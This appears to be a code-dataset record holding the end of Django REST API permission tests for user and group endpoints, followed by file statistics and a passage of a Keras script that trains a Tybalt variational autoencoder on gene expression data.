    def test_group_delete_no_access(self):
        self._create_test_group()

        count_before = Group.objects.count()

        resp = self._request_test_group_delete_api_view()
        self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)

        self.assertEqual(Group.objects.count(), count_before)

    def test_group_delete_with_access(self):
        self._create_test_group()
        self.grant_access(obj=self.test_group, permission=permission_group_delete)

        count_before = Group.objects.count()

        resp = self._request_test_group_delete_api_view()
        self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)

        # The group is gone.
        self.assertEqual(Group.objects.count(), count_before - 1)

    def test_group_edit_via_patch_no_access(self):
        self._create_test_group()

        name_before = self.test_group.name

        resp = self._request_test_group_edit_patch_api_view()
        self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)

        self.test_group.refresh_from_db()
        self.assertEqual(self.test_group.name, name_before)

    def test_group_edit_via_patch_with_access(self):
        self._create_test_group()
        self.grant_access(obj=self.test_group, permission=permission_group_edit)

        name_before = self.test_group.name

        resp = self._request_test_group_edit_patch_api_view()
        self.assertEqual(resp.status_code, status.HTTP_200_OK)

        # Name must have changed after a successful PATCH.
        self.test_group.refresh_from_db()
        self.assertNotEqual(self.test_group.name, name_before)

    def test_group_edit_via_put_no_access(self):
        self._create_test_group()

        name_before = self.test_group.name

        resp = self._request_test_group_edit_put_api_view()
        self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)

        self.test_group.refresh_from_db()
        self.assertEqual(self.test_group.name, name_before)

    def test_group_edit_via_put_with_access(self):
        self._create_test_group()
        self.grant_access(obj=self.test_group, permission=permission_group_edit)

        name_before = self.test_group.name

        resp = self._request_test_group_edit_put_api_view()
        self.assertEqual(resp.status_code, status.HTTP_200_OK)

        # Name must have changed after a successful PUT.
        self.test_group.refresh_from_db()
        self.assertNotEqual(self.test_group.name, name_before)
class UserAPITestCase(UserAPITestMixin, UserTestMixin, BaseAPITestCase):
    """REST API tests for user create/delete/edit under ACL checks."""

    def test_user_create_api_view_no_permission(self):
        count_before = get_user_model().objects.count()

        resp = self._request_test_user_create_api_view()
        self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)

        # User table must be untouched.
        self.assertEqual(get_user_model().objects.count(), count_before)

    def test_user_create_api_view_with_permission(self):
        self.grant_permission(permission=permission_user_create)

        count_before = get_user_model().objects.count()

        resp = self._request_test_user_create_api_view()
        self.assertEqual(resp.status_code, status.HTTP_201_CREATED)

        # Exactly one new user was created.
        self.assertEqual(get_user_model().objects.count(), count_before + 1)

    def test_user_delete_no_access(self):
        self._create_test_user()

        count_before = get_user_model().objects.count()

        resp = self._request_test_user_delete_api_view()
        self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)

        self.assertEqual(get_user_model().objects.count(), count_before)

    def test_user_delete_with_access(self):
        self._create_test_user()
        self.grant_access(obj=self.test_user, permission=permission_user_delete)

        count_before = get_user_model().objects.count()

        resp = self._request_test_user_delete_api_view()
        self.assertEqual(resp.status_code, status.HTTP_204_NO_CONTENT)

        # The user is gone.
        self.assertEqual(get_user_model().objects.count(), count_before - 1)

    def test_user_edit_patch_api_view_no_access(self):
        self._create_test_user()

        username_before = self.test_user.username

        resp = self._request_test_user_edit_patch_api_view()
        self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)

        self.test_user.refresh_from_db()
        self.assertEqual(self.test_user.username, username_before)

    def test_user_edit_patch_api_view_with_access(self):
        self._create_test_user()
        self.grant_access(obj=self.test_user, permission=permission_user_edit)

        username_before = self.test_user.username

        resp = self._request_test_user_edit_patch_api_view()
        self.assertEqual(resp.status_code, status.HTTP_200_OK)

        # Username must have changed after a successful PATCH.
        self.test_user.refresh_from_db()
        self.assertNotEqual(self.test_user.username, username_before)

    def test_user_edit_put_api_view_no_access(self):
        self._create_test_user()

        username_before = self.test_user.username

        resp = self._request_test_user_edit_put_api_view()
        self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN)

        self.test_user.refresh_from_db()
        self.assertEqual(self.test_user.username, username_before)

    def test_user_edit_put_api_view_with_access(self):
        self._create_test_user()
        self.grant_access(obj=self.test_user, permission=permission_user_edit)

        username_before = self.test_user.username

        resp = self._request_test_user_edit_put_api_view()
        self.assertEqual(resp.status_code, status.HTTP_200_OK)

        # Username must have changed after a successful PUT.
        self.test_user.refresh_from_db()
        self.assertNotEqual(self.test_user.username, username_before)
class UserGroupAPITestCase(GroupTestMixin, UserAPITestMixin, UserTestMixin, BaseAPITestCase):
    """API tests for user/group membership endpoints.

    Exercises creating users with an initial group, attaching groups to an
    existing user, listing a user's groups, login, and password change,
    under each relevant permission/access combination.
    """

    def test_user_create_with_group_api_view_no_permission(self):
        # Without the user-create permission the request must be rejected
        # and the user count must not change.
        self._create_test_group()
        user_count = get_user_model().objects.count()
        response = self._request_test_user_create_api_view_extra_data()
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
        self.assertEqual(get_user_model().objects.count(), user_count)

    def test_user_create_with_group_api_view_with_permission(self):
        # With the create permission the user is created and is a member of
        # the test group supplied as extra data.
        self._create_test_group()
        self.grant_permission(permission=permission_user_create)
        user_count = get_user_model().objects.count()
        response = self._request_test_user_create_api_view_extra_data()
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.assertEqual(get_user_model().objects.count(), user_count + 1)
        self.test_user.refresh_from_db()
        self.assertTrue(self.test_group in self.test_user.groups.all())

    def test_user_group_add_api_view_no_permission(self):
        # No access at all: request rejected, membership unchanged.
        self._create_test_user()
        self._create_test_group()
        user_group_count = self.test_user.groups.count()
        response = self._request_test_user_group_add_api_view()
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
        self.test_user.refresh_from_db()
        self.assertEqual(self.test_user.groups.count(), user_group_count)

    def test_user_group_add_api_view_with_user_access(self):
        # NOTE(review): with user access only, the view answers 201 yet the
        # membership is NOT persisted (count unchanged) -- presumably the
        # view silently filters out groups the requester cannot view;
        # confirm this is the intended contract.
        self._create_test_user()
        self._create_test_group()
        self.grant_access(obj=self.test_user, permission=permission_user_edit)
        user_group_count = self.test_user.groups.count()
        response = self._request_test_user_group_add_api_view()
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.test_user.refresh_from_db()
        self.assertEqual(self.test_user.groups.count(), user_group_count)

    def test_user_group_add_api_view_with_group_access(self):
        # Group access alone is insufficient: the user object itself is not
        # accessible, so the request is rejected outright.
        self._create_test_user()
        self._create_test_group()
        self.grant_access(obj=self.test_group, permission=permission_group_view)
        user_group_count = self.test_user.groups.count()
        response = self._request_test_user_group_add_api_view()
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
        self.test_user.refresh_from_db()
        self.assertEqual(self.test_user.groups.count(), user_group_count)

    def test_user_group_add_api_view_with_full_access(self):
        # Both user edit access and group view access: the membership is
        # actually persisted.
        self._create_test_user()
        self._create_test_group()
        self.grant_access(obj=self.test_user, permission=permission_user_edit)
        self.grant_access(obj=self.test_group, permission=permission_group_view)
        user_group_count = self.test_user.groups.count()
        response = self._request_test_user_group_add_api_view()
        self.assertEqual(response.status_code, status.HTTP_201_CREATED)
        self.test_user.refresh_from_db()
        self.assertEqual(self.test_user.groups.count(), user_group_count + 1)

    def _create_test_user_with_test_group(self):
        # Helper: create a user that is already a member of the test group.
        self._create_test_group()
        self._create_test_user()
        self.test_user.groups.add(self.test_group)

    def test_user_group_list_no_access(self):
        self._create_test_user_with_test_group()
        response = self._request_test_user_group_list_api_view()
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_user_group_list_with_user_access(self):
        # User access grants the listing itself, but groups without view
        # access are filtered from the result (count == 0).
        self._create_test_user_with_test_group()
        self.grant_access(obj=self.test_user, permission=permission_user_view)
        response = self._request_test_user_group_list_api_view()
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['count'], 0)

    def test_user_group_list_with_group_access(self):
        # Without access to the user the list endpoint is unreachable.
        self._create_test_user_with_test_group()
        self.grant_access(obj=self.test_group, permission=permission_group_view)
        response = self._request_test_user_group_list_api_view()
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)

    def test_user_group_list_with_full_access(self):
        self._create_test_user_with_test_group()
        self.grant_access(obj=self.test_user, permission=permission_user_view)
        self.grant_access(obj=self.test_group, permission=permission_group_view)
        response = self._request_test_user_group_list_api_view()
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertEqual(response.data['count'], 1)

    def test_user_login_api_view(self):
        # Sanity check: the test user can log in with its cleartext password.
        self._create_test_user()
        self.assertTrue(
            self.login(
                username=self.test_user.username,
                password=self.test_user.cleartext_password
            )
        )

    def test_user_create_login_password_change_api_view_no_access(self):
        # NOTE(review): after a forbidden password change the login with
        # cleartext_password fails -- presumably the request helper updates
        # cleartext_password to the attempted new value even when the API
        # call is rejected; confirm against the mixin.
        self._create_test_user()
        response = self._request_test_user_password_change_api_view()
        self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
        self.assertFalse(
            self.login(
                username=self.test_user.username,
                password=self.test_user.cleartext_password
            )
        )

    def test_user_create_login_password_change_api_view_with_access(self):
        # With edit access the password change succeeds and the user can log
        # in with the (updated) cleartext password.
        self._create_test_user()
        self.grant_access(obj=self.test_user, permission=permission_user_edit)
        response = self._request_test_user_password_change_api_view()
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertTrue(
            self.login(
                username=self.test_user.username,
                password=self.test_user.cleartext_password
            )
        )
| 36.437143
| 93
| 0.739748
| 1,668
| 12,753
| 5.168465
| 0.04976
| 0.093725
| 0.05707
| 0.074701
| 0.915439
| 0.907783
| 0.894444
| 0.865793
| 0.83517
| 0.822178
| 0
| 0.008786
| 0.178938
| 12,753
| 349
| 94
| 36.541547
| 0.814535
| 0
| 0
| 0.718615
| 0
| 0
| 0.000784
| 0
| 0
| 0
| 0
| 0
| 0.242424
| 1
| 0.12987
| false
| 0.030303
| 0.030303
| 0
| 0.17316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d2866f522e6af8e6eeec851b450432eb020d5cdd
| 26,822
|
py
|
Python
|
scripts/functions/vae.py
|
greenelab/Pseudomonas_latent_spaces
|
0d78dc927a246c49f631abeddc0b952add4c6d0c
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/functions/vae.py
|
greenelab/Pseudomonas_latent_spaces
|
0d78dc927a246c49f631abeddc0b952add4c6d0c
|
[
"BSD-3-Clause"
] | 12
|
2018-07-02T19:35:31.000Z
|
2019-03-09T00:24:09.000Z
|
scripts/functions/vae.py
|
greenelab/Pseudomonas_latent_spaces
|
0d78dc927a246c49f631abeddc0b952add4c6d0c
|
[
"BSD-3-Clause"
] | 1
|
2018-06-25T14:21:51.000Z
|
2018-06-25T14:21:51.000Z
|
# -----------------------------------------------------------------------------------------------------------------------
# By Alexandra Lee
# (updated October 2018)
#
# Encode gene expression data into low dimensional latent space using
# Tybalt with 2-hidden layers
# --------------------------------------------------------------------------------------------------------------------
import os
import argparse
import pandas as pd
import tensorflow as tf
# To ensure reproducibility using Keras during development
# https://keras.io/getting-started/faq/#how-can-i-obtain-reproducible-results-using-keras-during-development
import numpy as np
import random as rn
from keras.layers import Input, Dense, Lambda, Layer, Activation
from keras.layers.normalization import BatchNormalization
from keras.models import Model, Sequential
from keras import metrics, optimizers
from keras.callbacks import Callback
from functions.helper_ae import sampling_maker, CustomVariationalLayer, WarmUpCallback
def tybalt_2layer_model(
        learning_rate,
        batch_size,
        epochs,
        kappa,
        intermediate_dim,
        latent_dim,
        epsilon_std,
        base_dir,
        analysis_name):
    """
    Train 2-layer Tybalt model using input dataset.

    Args:
        learning_rate: step size for the Adam optimizer.
        batch_size: total number of training examples in a single batch.
        epochs: number of complete passes through the dataset.
        kappa: warmup rate for the KL-divergence weight (beta).
        intermediate_dim: size of the hidden layer.
        latent_dim: dimensionality of the latent space (fixed by the user).
            Note: the intrinsic latent space dimension is unknown.
        epsilon_std: standard deviation of the reparameterization noise.
        base_dir: root directory containing "data", "stats", "encoded" and
            "models" subdirectories.
        analysis_name: name of the analysis subdirectory to read from and
            write to.

    Output:
    Encoding and decoding neural networks to use in downstream analysis,
    saved to disk together with training statistics, the encoded latent
    representation and a combined gene weight matrix.
    """
    # The below is necessary in Python 3.2.3 onwards to
    # have reproducible behavior for certain hash-based operations.
    # See these references for further details:
    # https://docs.python.org/3.4/using/cmdline.html#envvar-PYTHONHASHSEED
    # https://github.com/keras-team/keras/issues/2280#issuecomment-306959926
    random_state = 123
    # NOTE(review): setting PYTHONHASHSEED at runtime does not affect hash
    # randomization of the already-running interpreter; it must be set before
    # the Python process starts. Kept for parity with the reference recipe.
    os.environ['PYTHONHASHSEED'] = '0'
    # The below is necessary for starting Numpy generated random numbers
    # in a well-defined initial state.
    np.random.seed(42)
    # The below is necessary for starting core Python generated random numbers
    # in a well-defined state.
    rn.seed(12345)
    # Force TensorFlow to use single thread.
    # Multiple threads are a potential source of
    # non-reproducible results.
    # For further details, see: https://stackoverflow.com/questions/42022950/which-seeds-have-to-be-set-where-to-realize-100-reproducibility-of-training-res
    session_conf = tf.ConfigProto(
        intra_op_parallelism_threads=1, inter_op_parallelism_threads=1)
    from keras import backend as K

    # The below tf.set_random_seed() will make random number generation
    # in the TensorFlow backend have a well-defined initial state.
    # For further details, see: https://www.tensorflow.org/api_docs/python/tf/set_random_seed
    tf.set_random_seed(1234)
    sess = tf.Session(graph=tf.get_default_graph(), config=session_conf)
    K.set_session(sess)

    # --------------------------------------------------------------------------------------------------------------------
    # Files
    # --------------------------------------------------------------------------------------------------------------------
    data_file = os.path.join(
        base_dir, "data", analysis_name, "train_model_input.txt.xz")
    rnaseq = pd.read_table(data_file, index_col=0, header=0, compression='xz')

    # --------------------------------------------------------------------------------------------------------------------
    # Initialize hyper parameters
    #
    # learning rate:
    # batch size: Total number of training examples present in a single batch
    #             Iterations is the number of batches needed to complete one epoch
    # epochs: One Epoch is when an ENTIRE dataset is passed forward and backward through the neural network only ONCE
    # kappa: warmup
    # original dim: dimensions of the raw data
    # latent dim: dimensions of the latent space (fixed by the user)
    #             Note: intrinsic latent space dimension unknown
    # epsilon std:
    # beta: Threshold value for ReLU?
    # --------------------------------------------------------------------------------------------------------------------
    original_dim = rnaseq.shape[1]
    beta = K.variable(0)

    stat_file = os.path.join(base_dir, "stats", analysis_name,
                             "tybalt_2layer_{}latent_stats.tsv".format(latent_dim))
    hist_plot_file = os.path.join(
        base_dir, "stats", analysis_name, "tybalt_2layer_{}latent_hist.png".format(latent_dim))
    encoded_file = os.path.join(base_dir, "encoded", analysis_name,
                                "train_input_2layer_{}latent_encoded.txt".format(latent_dim))
    model_encoder_file = os.path.join(base_dir, "models", analysis_name,
                                      "tybalt_2layer_{}latent_encoder_model.h5".format(latent_dim))
    weights_encoder_file = os.path.join(base_dir, "models", analysis_name,
                                        "tybalt_2layer_{}latent_encoder_weights.h5".format(latent_dim))
    model_decoder_file = os.path.join(base_dir, "models", analysis_name,
                                      "tybalt_2layer_{}latent_decoder_model.h5".format(latent_dim))
    weights_decoder_file = os.path.join(base_dir, "models", analysis_name,
                                        "tybalt_2layer_{}latent_decoder_weights.h5".format(latent_dim))

    # --------------------------------------------------------------------------------------------------------------------
    # Data initializations
    # --------------------------------------------------------------------------------------------------------------------
    # Split 10% test set randomly
    test_set_percent = 0.1
    rnaseq_test_df = rnaseq.sample(
        frac=test_set_percent, random_state=random_state)
    rnaseq_train_df = rnaseq.drop(rnaseq_test_df.index)

    # Create a placeholder for an encoded (original-dimensional) input
    rnaseq_input = Input(shape=(original_dim, ))

    # --------------------------------------------------------------------------------------------------------------------
    # Architecture of VAE
    # --------------------------------------------------------------------------------------------------------------------
    # ENCODER
    # Input layer is compressed into a mean and log variance vector of size
    # `latent_dim`. Each layer is initialized with glorot uniform weights and each
    # step (dense connections, batch norm, and relu activation) are funneled
    # separately
    # Each vector of length `latent_dim` are connected to the rnaseq input tensor
    # "z_mean_dense_linear" is the encoded representation of the input
    # Take as input arrays of shape (*, original dim) and output arrays of shape (*, latent dim)
    # Combine input from previous layer using linear sum
    # Normalize the activations (combined weighted nodes of the previous layer)
    # Transformation that maintains the mean activation close to 0 and the activation standard deviation close to 1.
    # Apply ReLU activation function to combine weighted nodes from previous layer
    # relu = threshold cutoff (cutoff value will be learned)
    # ReLU function filters noise
    # X is encoded using Q(z|X) to yield mu(X), sigma(X) that describes latent space distribution
    hidden_dense_linear = Dense(
        intermediate_dim, kernel_initializer='glorot_uniform')(rnaseq_input)
    hidden_dense_batchnorm = BatchNormalization()(hidden_dense_linear)
    hidden_encoded = Activation('relu')(hidden_dense_batchnorm)

    # Note:
    # Normalize and relu filter at each layer adds non-linear component (relu is non-linear function)
    # If architecture is layer-layer-normalization-relu then the computation is still linear
    # Add additional layers in triplicate
    z_mean_dense_linear = Dense(
        latent_dim, kernel_initializer='glorot_uniform')(hidden_encoded)
    z_mean_dense_batchnorm = BatchNormalization()(z_mean_dense_linear)
    z_mean_encoded = Activation('relu')(z_mean_dense_batchnorm)

    # NOTE(review): the log-variance branch reads from rnaseq_input directly
    # (not from hidden_encoded) -- presumably intentional, matching the
    # original Tybalt architecture; confirm.
    z_log_var_dense_linear = Dense(
        latent_dim, kernel_initializer='glorot_uniform')(rnaseq_input)
    z_log_var_dense_batchnorm = BatchNormalization()(z_log_var_dense_linear)
    z_log_var_encoded = Activation('relu')(z_log_var_dense_batchnorm)

    # Customized layer
    # Returns the encoded and randomly sampled z vector
    # Takes two keras layers as input to the custom sampling function layer with a
    # `latent_dim` output
    #
    # sampling():
    # randomly sample similar points z from the latent normal distribution that is assumed to generate the data,
    # via z = z_mean + exp(z_log_sigma) * epsilon, where epsilon is a random normal tensor
    # z ~ Q(z|X)
    # Note: there is a trick to reparameterize to standard normal distribution so that the space is differentiable and
    # therefore gradient descent can be used
    z = Lambda(sampling_maker(epsilon_std),
               output_shape=(latent_dim, ))([z_mean_encoded, z_log_var_encoded])

    # DECODER
    # The decoding layer is much simpler with a single layer glorot uniform
    # initialized and sigmoid activation
    # Reconstruct P(X|z)
    decoder_model = Sequential()
    decoder_model.add(
        Dense(intermediate_dim, activation='relu', input_dim=latent_dim))
    decoder_model.add(Dense(original_dim, activation='sigmoid'))
    rnaseq_reconstruct = decoder_model(z)

    # CONNECTIONS
    # fully-connected network
    adam = optimizers.Adam(lr=learning_rate)
    vae_layer = CustomVariationalLayer(original_dim, z_log_var_encoded, z_mean_encoded, beta)([
        rnaseq_input, rnaseq_reconstruct])
    vae = Model(rnaseq_input, vae_layer)
    vae.compile(optimizer=adam, loss=None, loss_weights=[beta])

    # --------------------------------------------------------------------------------------------------------------------
    # Training
    # --------------------------------------------------------------------------------------------------------------------
    # fit Model
    # hist: record of the training loss at each epoch
    hist = vae.fit(np.array(rnaseq_train_df), shuffle=True, epochs=epochs, batch_size=batch_size,
                   validation_data=(np.array(rnaseq_test_df), None),
                   callbacks=[WarmUpCallback(beta, kappa)])

    # --------------------------------------------------------------------------------------------------------------------
    # Use trained model to make predictions
    # --------------------------------------------------------------------------------------------------------------------
    encoder = Model(rnaseq_input, z_mean_encoded)
    encoded_rnaseq_df = encoder.predict_on_batch(rnaseq)
    encoded_rnaseq_df = pd.DataFrame(encoded_rnaseq_df, index=rnaseq.index)
    encoded_rnaseq_df.columns.name = 'sample_id'
    # Latent features are 1-based in the output files
    encoded_rnaseq_df.columns = encoded_rnaseq_df.columns + 1

    # --------------------------------------------------------------------------------------------------------------------
    # Visualize training performance
    # --------------------------------------------------------------------------------------------------------------------
    history_df = pd.DataFrame(hist.history)
    ax = history_df.plot()
    ax.set_xlabel('Epochs')
    ax.set_ylabel('VAE Loss')
    fig = ax.get_figure()
    fig.savefig(hist_plot_file)
    del ax, fig

    # --------------------------------------------------------------------------------------------------------------------
    # Output
    # --------------------------------------------------------------------------------------------------------------------
    # Save training performance along with the hyperparameters used
    history_df = pd.DataFrame(hist.history)
    history_df = history_df.assign(learning_rate=learning_rate)
    history_df = history_df.assign(batch_size=batch_size)
    history_df = history_df.assign(epochs=epochs)
    history_df = history_df.assign(kappa=kappa)
    history_df.to_csv(stat_file, sep='\t', index=False)

    # Save latent space representation
    encoded_rnaseq_df.to_csv(encoded_file, sep='\t')

    # Save models
    # (source) https://machinelearningmastery.com/save-load-keras-deep-learning-models/
    # Save encoder model
    encoder.save(model_encoder_file)
    # serialize weights to HDF5
    encoder.save_weights(weights_encoder_file)

    # Save decoder model
    # (source) https://github.com/greenelab/tybalt/blob/master/scripts/nbconverted/tybalt_vae.py
    # can generate from any sampled z vector
    decoder_input = Input(shape=(latent_dim, ))
    _x_decoded_mean = decoder_model(decoder_input)
    decoder = Model(decoder_input, _x_decoded_mean)
    decoder.save(model_decoder_file)
    # serialize weights to HDF5
    decoder.save_weights(weights_decoder_file)

    # Save weight matrix: how each gene contributes to each feature
    # Reuse the decoder built above (the original rebuilt an identical model
    # here, which was redundant): its layers are [InputLayer, Sequential].
    weights = [layer.get_weights() for layer in decoder.layers]

    # Multiply hidden layers together to obtain a single representation of gene weights
    intermediate_weight_df = pd.DataFrame(weights[1][0])
    hidden_weight_df = pd.DataFrame(weights[1][2])
    abstracted_weight_df = intermediate_weight_df.dot(hidden_weight_df)
    abstracted_weight_df.index = range(0, latent_dim)
    abstracted_weight_df.columns = rnaseq.columns

    weight_file = os.path.join(
        base_dir, "data", analysis_name, "VAE_weight_matrix.txt")
    abstracted_weight_df.to_csv(weight_file, sep='\t')
def tybalt_2layer_model_multi(
        learning_rate,
        batch_size,
        epochs,
        kappa,
        intermediate_dim,
        latent_dim,
        epsilon_std,
        base_dir,
        analysis_name,
        seed_input):
    """
    Train 2-layer Tybalt model using input dataset (seeded variant).

    Same as tybalt_2layer_model() but every random seed, the input file and
    every output file name are parameterized by seed_input, so multiple
    independently-seeded runs can coexist in the same analysis directory.

    Args:
        learning_rate: step size for the Adam optimizer.
        batch_size: total number of training examples in a single batch.
        epochs: number of complete passes through the dataset.
        kappa: warmup rate for the KL-divergence weight (beta).
        intermediate_dim: size of the hidden layer.
        latent_dim: dimensionality of the latent space (fixed by the user).
        epsilon_std: standard deviation of the reparameterization noise.
        base_dir: root directory containing "data", "stats", "encoded" and
            "models" subdirectories.
        analysis_name: name of the analysis subdirectory.
        seed_input: integer seed used for numpy, random, TensorFlow and the
            train/test split, and embedded in all file names.

    Output:
    Encoding and decoding neural networks to use in downstream analysis,
    saved to disk together with training statistics, the encoded latent
    representation and a combined gene weight matrix.
    """
    # The below is necessary in Python 3.2.3 onwards to
    # have reproducible behavior for certain hash-based operations.
    # See these references for further details:
    # https://docs.python.org/3.4/using/cmdline.html#envvar-PYTHONHASHSEED
    # https://github.com/keras-team/keras/issues/2280#issuecomment-306959926
    random_state = seed_input
    # NOTE(review): setting PYTHONHASHSEED at runtime does not affect hash
    # randomization of the already-running interpreter; it must be set before
    # the Python process starts. Kept for parity with the reference recipe.
    os.environ['PYTHONHASHSEED'] = '0'
    # The below is necessary for starting Numpy generated random numbers
    # in a well-defined initial state.
    np.random.seed(seed_input)
    # The below is necessary for starting core Python generated random numbers
    # in a well-defined state.
    rn.seed(seed_input)
    # Force TensorFlow to use single thread.
    # Multiple threads are a potential source of
    # non-reproducible results.
    # For further details, see: https://stackoverflow.com/questions/42022950/which-seeds-have-to-be-set-where-to-realize-100-reproducibility-of-training-res
    session_conf = tf.ConfigProto(
        intra_op_parallelism_threads=1, inter_op_parallelism_threads=1)
    from keras import backend as K

    # The below tf.set_random_seed() will make random number generation
    # in the TensorFlow backend have a well-defined initial state.
    # For further details, see: https://www.tensorflow.org/api_docs/python/tf/set_random_seed
    tf.set_random_seed(seed_input)
    sess = tf.Session(graph=tf.get_default_graph(), config=session_conf)
    K.set_session(sess)

    # --------------------------------------------------------------------------------------------------------------------
    # Files
    # --------------------------------------------------------------------------------------------------------------------
    data_file = os.path.join(
        base_dir, "data", analysis_name, "train_model_input_seed" + str(seed_input) + ".txt.xz")
    rnaseq = pd.read_table(data_file, index_col=0, header=0, compression='xz')

    # --------------------------------------------------------------------------------------------------------------------
    # Initialize hyper parameters
    #
    # learning rate:
    # batch size: Total number of training examples present in a single batch
    #             Iterations is the number of batches needed to complete one epoch
    # epochs: One Epoch is when an ENTIRE dataset is passed forward and backward through the neural network only ONCE
    # kappa: warmup
    # original dim: dimensions of the raw data
    # latent dim: dimensions of the latent space (fixed by the user)
    #             Note: intrinsic latent space dimension unknown
    # epsilon std:
    # beta: Threshold value for ReLU?
    # --------------------------------------------------------------------------------------------------------------------
    original_dim = rnaseq.shape[1]
    beta = K.variable(0)

    stat_file = os.path.join(base_dir, "stats", analysis_name,
                             "tybalt_2layer_latent_stats_seed" + str(seed_input) + ".tsv")
    hist_plot_file = os.path.join(
        base_dir, "stats", analysis_name, "tybalt_2layer_latent_hist_seed" + str(seed_input) + ".png")
    encoded_file = os.path.join(base_dir, "encoded", analysis_name,
                                "train_input_2layer_latent_encoded_seed" + str(seed_input) + ".txt")
    model_encoder_file = os.path.join(base_dir, "models", analysis_name,
                                      "tybalt_2layer_latent_encoder_model_seed" + str(seed_input) + ".h5")
    weights_encoder_file = os.path.join(base_dir, "models", analysis_name,
                                        "tybalt_2layer_latent_encoder_weights_seed" + str(seed_input) + ".h5")
    model_decoder_file = os.path.join(base_dir, "models", analysis_name,
                                      "tybalt_2layer_latent_decoder_model_seed" + str(seed_input) + ".h5")
    weights_decoder_file = os.path.join(base_dir, "models", analysis_name,
                                        "tybalt_2layer_latent_decoder_weights_seed" + str(seed_input) + ".h5")

    # --------------------------------------------------------------------------------------------------------------------
    # Data initializations
    # --------------------------------------------------------------------------------------------------------------------
    # Split 10% test set randomly
    test_set_percent = 0.1
    rnaseq_test_df = rnaseq.sample(
        frac=test_set_percent, random_state=random_state)
    rnaseq_train_df = rnaseq.drop(rnaseq_test_df.index)

    # Create a placeholder for an encoded (original-dimensional) input
    rnaseq_input = Input(shape=(original_dim, ))

    # --------------------------------------------------------------------------------------------------------------------
    # Architecture of VAE
    # --------------------------------------------------------------------------------------------------------------------
    # ENCODER
    # Input layer is compressed into a mean and log variance vector of size
    # `latent_dim`. Each layer is initialized with glorot uniform weights and each
    # step (dense connections, batch norm, and relu activation) are funneled
    # separately
    # Each vector of length `latent_dim` are connected to the rnaseq input tensor
    # "z_mean_dense_linear" is the encoded representation of the input
    # Take as input arrays of shape (*, original dim) and output arrays of shape (*, latent dim)
    # Combine input from previous layer using linear sum
    # Normalize the activations (combined weighted nodes of the previous layer)
    # Transformation that maintains the mean activation close to 0 and the activation standard deviation close to 1.
    # Apply ReLU activation function to combine weighted nodes from previous layer
    # relu = threshold cutoff (cutoff value will be learned)
    # ReLU function filters noise
    # X is encoded using Q(z|X) to yield mu(X), sigma(X) that describes latent space distribution
    hidden_dense_linear = Dense(
        intermediate_dim, kernel_initializer='glorot_uniform')(rnaseq_input)
    hidden_dense_batchnorm = BatchNormalization()(hidden_dense_linear)
    hidden_encoded = Activation('relu')(hidden_dense_batchnorm)

    # Note:
    # Normalize and relu filter at each layer adds non-linear component (relu is non-linear function)
    # If architecture is layer-layer-normalization-relu then the computation is still linear
    # Add additional layers in triplicate
    z_mean_dense_linear = Dense(
        latent_dim, kernel_initializer='glorot_uniform')(hidden_encoded)
    z_mean_dense_batchnorm = BatchNormalization()(z_mean_dense_linear)
    z_mean_encoded = Activation('relu')(z_mean_dense_batchnorm)

    # NOTE(review): the log-variance branch reads from rnaseq_input directly
    # (not from hidden_encoded) -- presumably intentional, matching the
    # original Tybalt architecture; confirm.
    z_log_var_dense_linear = Dense(
        latent_dim, kernel_initializer='glorot_uniform')(rnaseq_input)
    z_log_var_dense_batchnorm = BatchNormalization()(z_log_var_dense_linear)
    z_log_var_encoded = Activation('relu')(z_log_var_dense_batchnorm)

    # Customized layer
    # Returns the encoded and randomly sampled z vector
    # Takes two keras layers as input to the custom sampling function layer with a
    # `latent_dim` output
    #
    # sampling():
    # randomly sample similar points z from the latent normal distribution that is assumed to generate the data,
    # via z = z_mean + exp(z_log_sigma) * epsilon, where epsilon is a random normal tensor
    # z ~ Q(z|X)
    # Note: there is a trick to reparameterize to standard normal distribution so that the space is differentiable and
    # therefore gradient descent can be used
    z = Lambda(sampling_maker(epsilon_std),
               output_shape=(latent_dim, ))([z_mean_encoded, z_log_var_encoded])

    # DECODER
    # The decoding layer is much simpler with a single layer glorot uniform
    # initialized and sigmoid activation
    # Reconstruct P(X|z)
    decoder_model = Sequential()
    decoder_model.add(
        Dense(intermediate_dim, activation='relu', input_dim=latent_dim))
    decoder_model.add(Dense(original_dim, activation='sigmoid'))
    rnaseq_reconstruct = decoder_model(z)

    # CONNECTIONS
    # fully-connected network
    adam = optimizers.Adam(lr=learning_rate)
    vae_layer = CustomVariationalLayer(original_dim, z_log_var_encoded, z_mean_encoded, beta)([
        rnaseq_input, rnaseq_reconstruct])
    vae = Model(rnaseq_input, vae_layer)
    vae.compile(optimizer=adam, loss=None, loss_weights=[beta])

    # --------------------------------------------------------------------------------------------------------------------
    # Training
    # --------------------------------------------------------------------------------------------------------------------
    # fit Model
    # hist: record of the training loss at each epoch
    hist = vae.fit(np.array(rnaseq_train_df), shuffle=True, epochs=epochs, batch_size=batch_size,
                   validation_data=(np.array(rnaseq_test_df), None),
                   callbacks=[WarmUpCallback(beta, kappa)])

    # --------------------------------------------------------------------------------------------------------------------
    # Use trained model to make predictions
